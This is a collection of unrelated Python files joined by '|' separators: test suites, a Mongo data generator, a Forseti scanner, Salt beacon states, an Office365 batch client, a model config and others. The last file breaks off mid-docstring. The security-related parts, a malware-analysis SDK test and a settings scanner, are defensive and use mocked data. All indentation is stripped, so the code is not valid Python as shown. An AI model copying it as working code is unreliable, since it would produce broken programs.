from sphinx.builders.gettext import I18nBuilder
I18nBuilder.versioning_method = 'none'
def doctree_read(app, doctree):
if not isinstance(app.builder, I18nBuilder):
return
from docutils import nodes
from sphinx.versioning import add_uids
list(add_uids(doctree, nodes.TextElement))
app.connect('doctree-read', doctree_read)
|
from unittest.mock import patch
from pydragonfly.sdk.const import ANALYZED, MALICIOUS
from tests.mock_utils import MockAPIResponse
from tests.resources import APIResourceBaseTestCase
from tests.resources.test_analysis import AnalysisResultTestCase
class DragonflyTestCase(APIResourceBaseTestCase):
@property
def resource(self):
return self.df
@patch(
"pydragonfly.sdk.resources.analysis.Analysis.create",
return_value=MockAPIResponse({"id": 1}, 200),
)
def test_analyze_file(self, *args, **kwargs):
ret = self.df.analyze_file(
sample_name="test", sample_buffer=b"test_sample", retrieve_analysis=False
)
self.assertEqual(ret, 1)
@patch(
"pydragonfly.sdk.resources.analysis.Analysis.retrieve",
return_value=MockAPIResponse(AnalysisResultTestCase.result_json, 200),
)
@patch(
"pydragonfly.sdk.resources.report.Report.matched_rules",
return_value=MockAPIResponse(AnalysisResultTestCase.matched_rules_json, 200),
)
def test_analysis_result(self, *args, **kwargs):
result = self.df.analysis_result(12)
self.assertEqual(result.id, 12)
self.assertEqual(result.status, ANALYZED)
self.assertEqual(result.evaluation, MALICIOUS)
self.assertEqual(result.score, 10)
|
from email import generator
from os import listdir
from os.path import isfile, join
import numpy as np
import random
import string
from pymongo import MongoClient
from models.user import User
from models.channel import *
from models.workspace import Workspace
from models.settings import *
# Setup Mongo client
class MongoDatabase:
def __init__(self):
self.client = MongoClient("mongodb://localhost:27017/")
self.db = self.client['slack_database']
self.user_col = self.db['user_col']
self.direct_col = self.db['direct_col']
self.workspace_col = self.db['workspace_col']
class Generator:
def __init__(self):
self.mongo = MongoDatabase()
def generate_random_string(self, size: int=10):
return ''.join(random.choices(string.ascii_lowercase + string.digits, k=size))
def generate_random_number(self, size: int=9):
return random.randint(1, 10**size)
def generate_random_message(self):
words = [self.generate_random_string() for i in range(random.randint(3,10))]
return ' '.join(words)
def generate_random_user(self):
name = self.generate_random_string()
user = User(name)
settings = UserSetting()
settings.notifications = self.generate_notifications()
settings.language = self.generate_random_language()
settings.time_zone = self.generate_random_timezone()
user.settings = settings
return user
def generate_random_channel(self):
name = self.generate_random_string()
channel = Channel(name)
settings = ChannelSetting()
settings.censored_words = [self.generate_random_string() for i in range(random.randint(3,10))]
settings.archive = self.generate_random_archive()
channel.settings = settings
return channel
def generate_random_direct_channel(self, n_messages: int = 10):
user_pair = [i for i in self.mongo.user_col.aggregate([{'$sample':{'size':2}}])]
dc = DirectChannel(user_pair[0], user_pair[1])
dc.censored_words = [self.generate_random_string() for i in range(random.randint(3,10))]
dc.archive = self.generate_random_archive()
dc.messages = [self.generate_random_message() for _ in range(n_messages)]
settings = ChannelSetting()
settings.censored_words = [self.generate_random_string() for i in range(random.randint(3,10))]
settings.archive = self.generate_random_archive()
dc.settings = settings
return dc
def generate_random_workspace(self, n_users: int = 10, n_channels: int = 10, n_msgs_per_chnl: int = 20):
workspace_name = self.generate_random_string()
workspace = Workspace(workspace_name)
workspace.member_ids = [i['user_id'] for i in self.mongo.user_col.aggregate([{'$sample':{'size':n_users}}])]
workspace.channels = [self.generate_random_channel() for _ in range(n_channels)]
for channel in workspace.channels:
channel.name = self.generate_random_string()
channel.messages = [self.generate_random_message() for _ in range(n_msgs_per_chnl)]
return workspace
# For Settings
def generate_random_language(self):
language_list = ["German","English","Spanish","French","Italian","Portuguese","Russian","Japanese","Chinese","Korean"]
return random.choice(language_list)
def generate_random_timezone(self):
timezones = ['EST', 'CST', 'MST', 'PST', 'AST', 'AKST', 'HST']
return random.choice(timezones)
def generate_notifications(self):
return bool(random.getrandbits(1))
def generate_random_archive(self):
return bool(random.getrandbits(1))
def random_data_test(user_count: int=1000, workspace_count: int=100, channel_count: int=5,
direct_channel_count: int=400, n_msgs_per_chnl: int=50):
'''
Creates a database with the given number of users, workspaces, channels in each workspace, direct channels for each user, and messages by each user
'''
g = Generator()
mongo = MongoDatabase()
# make users
for _ in range(user_count):
user = g.generate_random_user()
mongo.user_col.insert_one({
'user_id': user.user_id,
'name': user.name,
'settings': {'notifications': user.settings.notifications,
'language': user.settings.language,
'time_zone': user.settings.time_zone}})
# make direct channels with messages
for _ in range(direct_channel_count):
dc = g.generate_random_direct_channel(n_msgs_per_chnl)
mongo.direct_col.insert_one({'member_ids': list(dc.member_ids), # NOTE: CHANGING FROM SET To LIST
'messages': dc.messages,
'settings':{'censored_words': list(dc.settings.censored_words), # NOTE: CHANGING FROM SET To LIST
'archive': dc.settings.archive}})
# make workspaces with members and channels and messages
for _ in range(workspace_count):
workspace = g.generate_random_workspace(10, channel_count, n_msgs_per_chnl)
mongo.workspace_col.insert_one({'name':workspace.name,
'members':workspace.member_ids,
'channels': {channel.name: channel.messages for channel in workspace.channels},})
# TODO: Inesrt settings into workspace channels
def main():
mongo = MongoDatabase()
mongo.client.drop_database('slack_database')
random_data_test()
if __name__ == '__main__':
main()
|
# Copyright 2017 The Forseti Security Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Scanner for the GroupsSettings rules engine."""
import json
from google.cloud.forseti.common.gcp_type import groups_settings
from google.cloud.forseti.common.util import logger
from google.cloud.forseti.scanner.audit import groups_settings_rules_engine
from google.cloud.forseti.scanner.scanners import base_scanner
LOGGER = logger.get_logger(__name__)
class GroupsSettingsScanner(base_scanner.BaseScanner):
"""Scanner for GroupsSettings data."""
def __init__(self, global_configs, scanner_configs, service_config,
model_name, snapshot_timestamp, rules):
"""Initialization.
Args:
global_configs (dict): Global configurations.
scanner_configs (dict): Scanner configurations.
service_config (ServiceConfig): Forseti 2.0 service configs
model_name (str): name of the data model
snapshot_timestamp (str): Timestamp, formatted as YYYYMMDDTHHMMSSZ.
rules (str): Fully-qualified path and filename of the rules file.
"""
super(GroupsSettingsScanner, self).__init__(
global_configs,
scanner_configs,
service_config,
model_name,
snapshot_timestamp,
rules)
self.rules_engine = (groups_settings_rules_engine.
GroupsSettingsRulesEngine(
rules_file_path=self.rules,
snapshot_timestamp=self.snapshot_timestamp))
self.rules_engine.build_rule_book(self.global_configs)
@staticmethod
def _flatten_violations(violations):
"""Flatten RuleViolations into a dict for each RuleViolation member.
Args:
violations (list): The RuleViolations to flatten.
Yields:
dict: Iterator of RuleViolations as a dict per member.
"""
for violation in violations:
resource_data = {
'whoCanAdd': violation.whoCanAdd,
'whoCanJoin': violation.whoCanJoin,
'whoCanViewMembership': violation.whoCanViewMembership,
'whoCanViewGroup': violation.whoCanViewGroup,
'whoCanInvite': violation.whoCanInvite,
'allowExternalMembers': violation.allowExternalMembers,
'whoCanLeaveGroup': violation.whoCanLeaveGroup,
}
yield {
'resource_id': violation.group_email,
'full_name': violation.group_email,
'resource_name': violation.group_email,
'resource_data': json.dumps(resource_data, sort_keys=True),
'violation_data': violation.violation_reason,
'resource_type': violation.resource_type,
'rule_index': violation.rule_index,
'rule_name': violation.rule_name,
'violation_type': violation.violation_type,
}
def _output_results(self, all_violations):
"""Output results.
Args:
all_violations (list): All violations.
"""
all_violations = list(self._flatten_violations(all_violations))
self._output_results_to_db(all_violations)
def _find_violations(self, all_groups_settings, iam_groups_settings):
"""Find violations in the settings.
Args:
all_groups_settings (list): GroupsSettings list to find violations
in.
iam_groups_settings (list): GroupsSettings list for only those
groups settings that have at least 1 iam policy, to find violations
in.
Returns:
list: All violations.
"""
all_violations = []
LOGGER.info('Finding groups settings violations...')
for settings in all_groups_settings:
violations = self.rules_engine.find_violations(settings,
iam_only=False)
LOGGER.debug(violations)
all_violations.extend(violations)
for settings in iam_groups_settings:
violations = self.rules_engine.find_violations(settings,
iam_only=True)
LOGGER.debug(violations)
all_violations.extend(violations)
return all_violations
def _retrieve(self):
"""Runs the data collection.
Returns:
tupl: 2 lists of GroupsSettings objects, 1 only for settings that
have iam policies and 1 with all groups settings.
Raises:
ValueError: if resources have an unexpected type.
"""
all_groups_settings = []
iam_groups_settings = []
model_manager = self.service_config.model_manager
scoped_session, data_access = model_manager.get(self.model_name)
with scoped_session as session:
for settings in data_access.scanner_fetch_groups_settings(session,
True):
email = settings[0].split('group/')[1]
iam_groups_settings.append(groups_settings.GroupsSettings
.from_json(email, settings[1]))
for settings in data_access.scanner_fetch_groups_settings(session,
False):
email = settings[0].split('group/')[1]
all_groups_settings.append(groups_settings.GroupsSettings
.from_json(email, settings[1]))
return (all_groups_settings, iam_groups_settings)
def run(self):
"""Run, the entry point for this scanner."""
all_groups_settings, iam_groups_settings = self._retrieve()
all_violations = self._find_violations(all_groups_settings,
iam_groups_settings)
self._output_results(all_violations)
|
import unittest
from os.path import abspath, join
from robot import api, model, parsing, reporting, result, running
from robot.utils.asserts import assert_equals
class TestExposedApi(unittest.TestCase):
def test_test_case_file(self):
assert_equals(api.TestCaseFile, parsing.TestCaseFile)
def test_test_data_directory(self):
assert_equals(api.TestDataDirectory, parsing.TestDataDirectory)
def test_resource_file(self):
assert_equals(api.ResourceFile, parsing.ResourceFile)
def test_test_data(self):
assert_equals(api.TestData, parsing.TestData)
def test_execution_result(self):
assert_equals(api.ExecutionResult, result.ExecutionResult)
def test_test_suite(self):
assert_equals(api.TestSuite, running.TestSuite)
def test_result_writer(self):
assert_equals(api.ResultWriter, reporting.ResultWriter)
def test_visitors(self):
assert_equals(api.SuiteVisitor, model.SuiteVisitor)
assert_equals(api.ResultVisitor, result.ResultVisitor)
class TestTestSuiteBuilder(unittest.TestCase):
sources = [join(abspath(__file__), '..', '..', '..', 'atest', 'testdata', 'misc', n)
for n in ('pass_and_fail.robot', 'normal.robot')]
def test_create_with_datasources_as_list(self):
suite = api.TestSuiteBuilder().build(*self.sources)
assert_equals(suite.name, 'Pass And Fail & Normal')
def test_create_with_datasource_as_string(self):
suite = api.TestSuiteBuilder().build(self.sources[0])
assert_equals(suite.name, 'Pass And Fail')
if __name__ == '__main__':
unittest.main()
|
from PIL import Image
import os
percent = 0.5
for file_name in os.listdir("../foto/"):
if file_name == "pic8.jpg":
img = Image.open("../foto/"+str(file_name))
if img.size[0] > img.size[1]:
#foto orizzontale
hsize = int((float(img.size[0]) * float(percent)))
vsize = int((float(img.size[1]) * float(percent)))
else:
#foto verticale
hsize = int((float(img.size[0]) * float(percent)))
vsize = int((float(img.size[1]) * float(percent)))
img = img.resize((hsize, vsize), Image.ANTIALIAS)
img.save(file_name)
|
import sqlite3
from contextlib import closing
with closing(sqlite3.connect('sample.db')) as conn:
c = conn.cursor()
c.execute('create table users (id integer primary key, name varchar, age integer, gender varchar)')
c.executemany('insert into users (name, age, gender) values (?, ?, ?)', [
('Alex', 54, 'male'),
('Nancy', 40, 'female'),
('Tetsu', 16, 'male'),
('Saki', 21, 'female')
])
conn.commit()
|
"""
Here come the tests for attention types and their compatibility
"""
import unittest
import torch
from torch.autograd import Variable
import onmt
class TestAttention(unittest.TestCase):
def test_masked_global_attention(self):
source_lengths = torch.IntTensor([7, 3, 5, 2])
# illegal_weights_mask = torch.ByteTensor([
# [0, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 1, 1, 1, 1],
# [0, 0, 0, 0, 0, 1, 1],
# [0, 0, 1, 1, 1, 1, 1]])
batch_size = source_lengths.size(0)
dim = 20
memory_bank = Variable(torch.randn(batch_size,
source_lengths.max(), dim))
hidden = Variable(torch.randn(batch_size, dim))
attn = onmt.modules.Attention(dim)
_, alignments = attn(hidden, memory_bank,
memory_lengths=source_lengths)
# TODO: fix for pytorch 0.3
# illegal_weights = alignments.masked_select(illegal_weights_mask)
# self.assertEqual(0.0, illegal_weights.data.sum())
|
"""Environment wrapper class for logging episodes.
This can be used to record data from a subject playing the task. See
../../moog_demos/restore_logged_data.py for an example of how to read log files.
Note: This logger records everything about the environment, which can be a lot
of data (depending on the task). If you plan to use this at scale for recording
subjects' or agents' behavior, we recommend forking this and modifying it to
only log the data that you need to do analyses for your specific task. For
example you may not want to log the positions/velocities of static sprites
(e.g. walls), or may not want to log all the attributes of sprites every
timestep (e.g. if you know that the colors of the sprites don't change in your
task).
"""
import copy
from datetime import datetime
import json
import logging
import numpy as np
import os
import time
from moog import env_wrappers
from moog import sprite
# This is the number of numerals in filenames. Since there is one file per
# episode, you should pick _FILENAME_ZFILL large enough that the number of
# episodes in your dataset is less than 10^_FILENAME_ZFILL.
_FILENAME_ZFILL = 5
class VertexLogging():
NEVER = 'NEVER'
ALWAYS = 'ALWAYS'
WHEN_NECESSARY = 'WHEN_NECESSARY'
def _serialize(x):
"""Serialize a value x.
This is used to serialize sprite attributes, actions, and meta_state so that
they are json-writable.
Specifically, numpy arrays are not JSON serializable, so we must convert
numpy arrays to lists. This function is recursive to handle nestings inside
of lists/tuples/dictionaries.
Args:
x: Value to serialize.
Returns:
Serialized value that can be JSON dumped.
"""
if isinstance(x, np.ndarray):
return x.tolist()
elif isinstance(x, (np.float32, np.float64)):
return float(x)
elif isinstance(x, (np.int32, np.int64)):
return int(x)
elif isinstance(x, list):
return [_serialize(a) for a in x]
elif isinstance(x, tuple):
return tuple([_serialize(a) for a in x])
elif isinstance(x, dict):
return {k: _serialize(v) for k, v in x.items()}
else:
return x
class LoggingEnvironment(env_wrappers.AbstractEnvironmentWrapper):
"""Environment class for logging timesteps.
This logger produces a description of the log in 'description.txt' of
log_dir, so please refer to that for a detailed account of the structure of
the logs.
"""
def __init__(self, environment, log_dir='logs',
log_vertices='WHEN_NECESSARY'):
"""Constructor.
Args:
environment: Instance of ../moog/environment.Environment.
log_dir: String. Log directory relative to working directory.
log_vertices: String. Of the following options:
* 'NEVER'. In this case, never log sprite vertices.
* 'WHEN_NECESSARY'. In this case, log sprite vertices when a
sprite has either just appeared or just changed shape. In
this way, the vertices of a sprite can always be inferred
from the current position/angle/aspect_ratio and the
vertices that were logged for that sprite (identifiable by
its id) the last time its vertices were logged.
* 'ALWAYS'. Log vertices for all sprites every timestep.
"""
super(LoggingEnvironment, self).__init__(environment)
# Make sure log_vertices is a valid value
if not hasattr(VertexLogging, log_vertices):
raise ValueError('log_vertices is {} but must be in VertexLogging '
'values'.format(log_vertices))
self._log_vertices = log_vertices
# Set the logging directory
now_str = datetime.now().strftime("%Y_%m_%d_%H_%M_%S")
if log_dir[0] == '/':
log_dir = os.path.join(log_dir, now_str)
else:
log_dir = os.path.join(os.getcwd(), log_dir, now_str)
os.makedirs(log_dir)
self._log_dir = log_dir
# These are the attributes that we'll log
self._attributes = list(sprite.Sprite.FACTOR_NAMES) + ['id']
# Log attribute list
attributes_filename = os.path.join(self._log_dir, 'attributes.txt')
logging.info('Logging attribute list {} to {}.'.format(
self._attributes, attributes_filename))
with open(attributes_filename, 'w') as f:
json.dump(self._attributes, f)
# Log description
self._log_description()
# Initialize self._episode_log
self._episode_count = 0
self._episode_log = []
def _log_description(self):
"""Log a description of the data to a description.txt file."""
description_filename = os.path.join(self._log_dir, 'description.txt')
logging.info('Logging description to {}.'.format(description_filename))
description = (
'Each numerical file in this directory is an episode of the task. '
'Each such file contains a json-serialized list, each element of '
'which represents an environment step in the episode. Each step is '
'a list of four elements, [[`time`, time], [`reward`, reward], '
'[`step_type`, step_type], [`action`, action], [`meta_state`, '
'meta_state`], state].'
'\n\n'
'\n\n'
'time is a timestamp of the timestep.'
'\n\n'
'\n\n'
'reward contains the value of the reward at that step.'
'\n\n'
'\n\n'
'step_type indicates the dm_env.StepType of that step, i.e. '
'whether it was first, mid, or last.'
'\n\n'
'\n\n'
'action contains the agent action for the step.'
'\n\n'
'\n\n'
'meta_state is the serialized meta_state of the environment.'
'\n\n'
'\n\n'
'state is a list, each element of which represents a layer in the '
'environment state. The layer is represented as a list [k, [], [], '
'[], ...], where k is the layer name and the subsequent elements '
'are serialized sprites. Each serialized sprite is a list of '
'attributes. See attributes.txt for the attributes contained.'
)
if self._log_vertices == VertexLogging.ALWAYS:
description += (
' Furthermore, a list of vertices is appended to the attribute '
'list for each serialized sprite.'
)
elif self._log_vertices == VertexLogging.WHEN_NECESSARY:
description += (
'\n\n'
'\n\n'
'Furthermore, a list of vertices is appended to the attribute '
'list for a serialized for the first timestep in which that '
'serialized sprite appears, or when the sprite has changed '
'shape.'
)
with open(description_filename, 'w') as f:
f.write(description)
def _serialize_sprite(self, s):
"""Serialize a sprite as a list of attributes."""
attributes = [_serialize(getattr(s, x)) for x in self._attributes]
if (self._log_vertices == VertexLogging.ALWAYS or
(self._log_vertices == VertexLogging.WHEN_NECESSARY and
s.just_set_shape)):
attributes.append(s.vertices.tolist())
s.just_set_shape = False
return attributes
def _serialized_state(self):
"""Serialized a state."""
serialized_state = [
[k, [self._serialize_sprite(s) for s in self.state[k]]]
for k in self.state
]
return serialized_state
def step(self, action):
"""Step the environment with an action, logging timesteps."""
timestep = self._environment.step(action)
str_timestep = (
[['time', time.time()],
['reward', timestep.reward],
['step_type', timestep.step_type.value],
['action', _serialize(action)],
['meta_state', _serialize(self._environment.meta_state)],
self._serialized_state()]
)
self._episode_log.append(str_timestep)
if timestep.last():
# Write the episode to a log file
episode_count_str = str(self._episode_count).zfill(_FILENAME_ZFILL)
filename = os.path.join(self._log_dir, episode_count_str)
logging.info('Logging episode {} to {}.'.format(
self._episode_count, filename))
with open(filename, 'w') as f:
json.dump(self._episode_log, f)
self._episode_count += 1
self._episode_log = []
return timestep
|
# -*- coding: utf-8 -*-
'''
Management of the Salt beacons
==============================
.. versionadded:: 2015.8.0
.. code-block:: yaml
ps:
beacon.present:
- save: True
- enable: False
- services:
salt-master: running
apache2: stopped
sh:
beacon.present: []
load:
beacon.present:
- averages:
1m:
- 0.0
- 2.0
5m:
- 0.0
- 1.5
15m:
- 0.1
- 1.0
'''
from __future__ import absolute_import, print_function, unicode_literals
# Import Salt libs
from salt.ext import six
import logging
log = logging.getLogger(__name__)
def present(name,
save=False,
**kwargs):
'''
Ensure beacon is configured with the included beacon data.
name
The name of the beacon ensure is configured.
save
True/False, if True the beacons.conf file be updated too. Default is False.
'''
ret = {'name': name,
'result': True,
'changes': {},
'comment': []}
current_beacons = __salt__['beacons.list'](return_yaml=False, **kwargs)
beacon_data = [{k: v} for k, v in six.iteritems(kwargs)]
if name in current_beacons:
if beacon_data == current_beacons[name]:
ret['comment'].append('Job {0} in correct state'.format(name))
else:
if __opts__.get('test'):
kwargs['test'] = True
result = __salt__['beacons.modify'](name, beacon_data, **kwargs)
ret['comment'].append(result['comment'])
ret['changes'] = result['changes']
else:
result = __salt__['beacons.modify'](name, beacon_data, **kwargs)
if not result['result']:
ret['result'] = result['result']
ret['comment'] = result['comment']
return ret
else:
if 'changes' in result:
ret['comment'].append('Modifying {0} in beacons'.format(name))
ret['changes'] = result['changes']
else:
ret['comment'].append(result['comment'])
else:
if __opts__.get('test'):
kwargs['test'] = True
result = __salt__['beacons.add'](name, beacon_data, **kwargs)
ret['comment'].append(result['comment'])
else:
result = __salt__['beacons.add'](name, beacon_data, **kwargs)
if not result['result']:
ret['result'] = result['result']
ret['comment'] = result['comment']
return ret
else:
ret['comment'].append('Adding {0} to beacons'.format(name))
if save:
if __opts__.get('test'):
ret['comment'].append('Beacon {0} would be saved'.format(name))
else:
result = __salt__['beacons.save']()
ret['comment'].append('Beacon {0} saved'.format(name))
ret['comment'] = '\n'.join(ret['comment'])
return ret
def absent(name,
save=False,
**kwargs):
'''
Ensure beacon is absent.
name
The name of the beacon ensured absent.
save
True/False, if True the beacons.conf file be updated too. Default is False.
'''
### NOTE: The keyword arguments in **kwargs are ignored in this state, but
### cannot be removed from the function definition, otherwise the use
### of unsupported arguments will result in a traceback.
ret = {'name': name,
'result': True,
'changes': {},
'comment': []}
current_beacons = __salt__['beacons.list'](return_yaml=False, **kwargs)
if name in current_beacons:
if __opts__.get('test'):
kwargs['test'] = True
result = __salt__['beacons.delete'](name, **kwargs)
ret['comment'].append(result['comment'])
else:
result = __salt__['beacons.delete'](name, **kwargs)
if not result['result']:
ret['result'] = result['result']
ret['comment'] = result['comment']
return ret
else:
ret['comment'].append('Removed {0} from beacons'.format(name))
else:
ret['comment'].append('{0} not configured in beacons'.format(name))
if save:
if __opts__.get('test'):
ret['comment'].append('Beacon {0} would be saved'.format(name))
else:
result = __salt__['beacons.save']()
ret['comment'].append('Beacon {0} saved'.format(name))
ret['comment'] = '\n'.join(ret['comment'])
return ret
def enabled(name, **kwargs):
'''
Enable a beacon.
name
The name of the beacon to enable.
'''
### NOTE: The keyword arguments in **kwargs are ignored in this state, but
### cannot be removed from the function definition, otherwise the use
### of unsupported arguments will result in a traceback.
ret = {'name': name,
'result': True,
'changes': {},
'comment': []}
current_beacons = __salt__['beacons.list'](return_yaml=False, **kwargs)
if name in current_beacons:
if __opts__.get('test'):
kwargs['test'] = True
result = __salt__['beacons.enable_beacon'](name, **kwargs)
ret['comment'].append(result['comment'])
else:
result = __salt__['beacons.enable_beacon'](name, **kwargs)
if not result['result']:
ret['result'] = result['result']
ret['comment'] = result['comment']
return ret
else:
ret['comment'].append('Enabled {0} from beacons'.format(name))
else:
ret['comment'].append('{0} not a configured beacon'.format(name))
ret['comment'] = '\n'.join(ret['comment'])
return ret
def disabled(name, **kwargs):
'''
Disable a beacon.
name
The name of the beacon to disable.
'''
### NOTE: The keyword arguments in **kwargs are ignored in this state, but
### cannot be removed from the function definition, otherwise the use
### of unsupported arguments will result in a traceback.
ret = {'name': name,
'result': True,
'changes': {},
'comment': []}
current_beacons = __salt__['beacons.list'](return_yaml=False, **kwargs)
if name in current_beacons:
if __opts__.get('test'):
kwargs['test'] = True
result = __salt__['beacons.disable_beacon'](name, **kwargs)
ret['comment'].append(result['comment'])
else:
result = __salt__['beacons.disable_beacon'](name, **kwargs)
if not result['result']:
ret['result'] = result['result']
ret['comment'] = result['comment']
return ret
else:
ret['comment'].append('Disabled beacon {0}.'.format(name))
else:
ret['comment'].append('Job {0} is not configured.'.format(name))
ret['comment'] = '\n'.join(ret['comment'])
return ret
|
import json
import re
from email import message_from_bytes
from email.message import Message
from office365.runtime.client_request import ClientRequest
from office365.runtime.http.http_method import HttpMethod
from office365.runtime.http.request_options import RequestOptions
from office365.runtime.queries.batch_query import BatchQuery, create_boundary
class ODataBatchRequest(ClientRequest):
def __init__(self, context):
super(ODataBatchRequest, self).__init__(context)
def build_request(self, query):
"""
:type query: office365.runtime.queries.client_query.BatchQuery
"""
url = "{0}$batch".format(self.context.service_root_url())
request = RequestOptions(url)
request.method = HttpMethod.Post
media_type = "multipart/mixed"
content_type = "; ".join([media_type, "boundary={0}".format(query.current_boundary)])
request.ensure_header('Content-Type', content_type)
request.data = self._prepare_payload(query).as_bytes()
return request
def process_response(self, response, query):
"""Parses an HTTP response.
:type response: requests.Response
:type query: office365.runtime.queries.client_query.BatchQuery
"""
content_id = 0
for response_info in self._read_response(response):
if response_info["content"] is not None:
qry = query.get(content_id)
self.context.pending_request().map_json(response_info["content"], qry.return_type)
content_id += 1
def _read_response(self, response):
"""Parses a multipart/mixed response body from from the position defined by the context.
:type response: requests.Response
"""
content_type = response.headers['Content-Type'].encode("ascii")
http_body = (
b"Content-Type: "
+ content_type
+ b"\r\n\r\n"
+ response.content
)
message = message_from_bytes(http_body) # type: Message
for raw_response in message.get_payload():
if raw_response.get_content_type() == "application/http":
yield self._deserialize_response(raw_response)
def _prepare_payload(self, query):
"""Serializes a batch request body.
:type query BatchQuery
"""
main_message = Message()
main_message.add_header("Content-Type", "multipart/mixed")
main_message.set_boundary(query.current_boundary)
if query.has_change_sets:
change_set_message = Message()
change_set_boundary = create_boundary("changeset_", True)
change_set_message.add_header("Content-Type", "multipart/mixed")
change_set_message.set_boundary(change_set_boundary)
for qry in query.change_sets:
request = qry.build_request()
message = self._serialize_request(request)
change_set_message.attach(message)
main_message.attach(change_set_message)
for qry in query.get_queries:
request = qry.build_request()
message = self._serialize_request(request)
main_message.attach(message)
return main_message
@staticmethod
def _normalize_headers(headers_raw):
headers = {}
for header_line in headers_raw:
k, v = header_line.split(":", 1)
headers[k] = v
return headers
def _deserialize_response(self, raw_response):
response = raw_response.get_payload(decode=True)
lines = list(filter(None, response.decode("utf-8").split("\r\n")))
response_status_regex = "^HTTP/1\\.\\d (\\d{3}) (.*)$"
status_result = re.match(response_status_regex, lines[0])
status_info = status_result.groups()
# validate for errors
if int(status_info[0]) >= 400:
raise ValueError(response)
if status_info[1] == "No Content" or len(lines) < 3:
headers_raw = lines[1:]
return {
"status": status_info,
"headers": self._normalize_headers(headers_raw),
"content": None
}
else:
*headers_raw, content = lines[1:]
content = json.loads(content)
return {
"status": status_info,
"headers": self._normalize_headers(headers_raw),
"content": content
}
@staticmethod
def _serialize_request(request):
"""Serializes a part of a batch request to a string. A part can be either a GET request or
a change set grouping several CUD (create, update, delete) requests.
:type request: RequestOptions
"""
eol = "\r\n"
method = request.method
if "X-HTTP-Method" in request.headers:
method = request.headers["X-HTTP-Method"]
lines = ["{method} {url} HTTP/1.1".format(method=method, url=request.url),
*[':'.join(h) for h in request.headers.items()]]
if request.data:
lines.append(eol)
lines.append(json.dumps(request.data))
buffer = eol + eol.join(lines) + eol
payload = buffer.encode('utf-8').lstrip()
message = Message()
message.add_header("Content-Type", "application/http")
message.add_header("Content-Transfer-Encoding", "binary")
message.set_payload(payload)
return message
|
from setuptools import setup, find_packages
from setuptools.command.test import test as TestCommand
import os, sys
# From here: http://pytest.org/2.2.4/goodpractises.html
class RunTests(TestCommand):
DIRECTORY = 'test'
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = [self.DIRECTORY]
self.test_suite = True
def run_tests(self):
# Import here, because outside the eggs aren't loaded.
import pytest
errno = pytest.main(self.test_args)
if errno:
raise SystemExit(errno)
def _version():
with open('streamy.py') as fp:
line = next(i for i in fp if i.startswith('__version__'))
return line.strip().split()[-1].strip("'")
NAME = 'streamy'
OWNER = 'timedata-org'
VERSION = _version()
URL = 'http://github.com/{OWNER}/{NAME}'.format(**locals())
DOWNLOAD_URL = '{URL}/archive/{VERSION}.tar.gz'.format(**locals())
if __name__ == '__main__':
setup(
name='streamy',
version=_version(),
description=('streamy splits a stream into a stream of strings that are'
' complete JSON expressions'),
author='Tom Ritchford',
author_email='tom@swirly.com',
url=URL,
download_url=DOWNLOAD_URL,
license='MIT',
packages=find_packages(exclude=['test']),
classifiers=[
'Development Status :: 5 - Production/Stable',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
],
tests_require=[],
cmdclass={'test': RunTests},
keywords=['git', 'import'],
include_package_data=True,
install_requires=[],
)
|
voxel_size = [0.05, 0.05, 0.1]
model = dict(
type='VoxelNet',
voxel_layer=dict(max_num_points=5,
point_cloud_range=[0, -40, -3, 70.4, 40, 1],
voxel_size=voxel_size,
max_voxels=(16000, 40000)),
voxel_encoder=dict(type='HardSimpleVFE'),
middle_encoder=dict(type='SparseEncoder',
in_channels=4,
sparse_shape=[41, 1600, 1408],
order=('conv', 'norm', 'act')),
backbone=dict(type='SECOND',
in_channels=256,
layer_nums=[5, 5],
layer_strides=[1, 2],
out_channels=[128, 256]),
neck=dict(type='SECONDFPN',
in_channels=[128, 256],
upsample_strides=[1, 2],
out_channels=[256, 256]),
bbox_head=dict(type='Anchor3DHead',
num_classes=3,
in_channels=512,
feat_channels=512,
use_direction_classifier=True,
anchor_generator=dict(
type='Anchor3DRangeGenerator',
ranges=[
[0, -40.0, -0.6, 70.4, 40.0, -0.6],
[0, -40.0, -0.6, 70.4, 40.0, -0.6],
[0, -40.0, -1.78, 70.4, 40.0, -1.78],
],
sizes=[[0.6, 0.8, 1.73], [0.6, 1.76, 1.73],
[1.6, 3.9, 1.56]],
rotations=[0, 1.57],
reshape_out=False),
diff_rad_by_sin=True,
bbox_coder=dict(type='DeltaXYZWLHRBBoxCoder'),
loss_cls=dict(type='FocalLoss',
use_sigmoid=True,
gamma=2.0,
alpha=0.25,
loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss',
beta=1.0 / 9.0,
loss_weight=2.0),
loss_dir=dict(type='CrossEntropyLoss',
use_sigmoid=False,
loss_weight=0.2)),
# model training and testing settings
train_cfg=dict(
assigner=[
dict( # for Pedestrian
type='MaxIoUAssigner',
iou_calculator=dict(type='BboxOverlapsNearest3D'),
pos_iou_thr=0.35,
neg_iou_thr=0.2,
min_pos_iou=0.2,
ignore_iof_thr=-1),
dict( # for Cyclist
type='MaxIoUAssigner',
iou_calculator=dict(type='BboxOverlapsNearest3D'),
pos_iou_thr=0.35,
neg_iou_thr=0.2,
min_pos_iou=0.2,
ignore_iof_thr=-1),
dict( # for Car
type='MaxIoUAssigner',
iou_calculator=dict(type='BboxOverlapsNearest3D'),
pos_iou_thr=0.6,
neg_iou_thr=0.45,
min_pos_iou=0.45,
ignore_iof_thr=-1),
],
allowed_border=0,
pos_weight=-1,
debug=False),
test_cfg=dict(use_rotate_nms=True,
nms_across_levels=False,
nms_thr=0.01,
score_thr=0.1,
min_bbox_size=0,
nms_pre=100,
max_num=50))
|
import time
from pycspr.api.get_block import execute as get_block
def execute(
polling_interval_seconds: float = 1.0,
max_polling_time_seconds: float = 120.0
) -> dict:
"""Returns last finialised block in current era.
:param polling_interval_seconds: Time interval time (in seconds) before polling for next switch block.
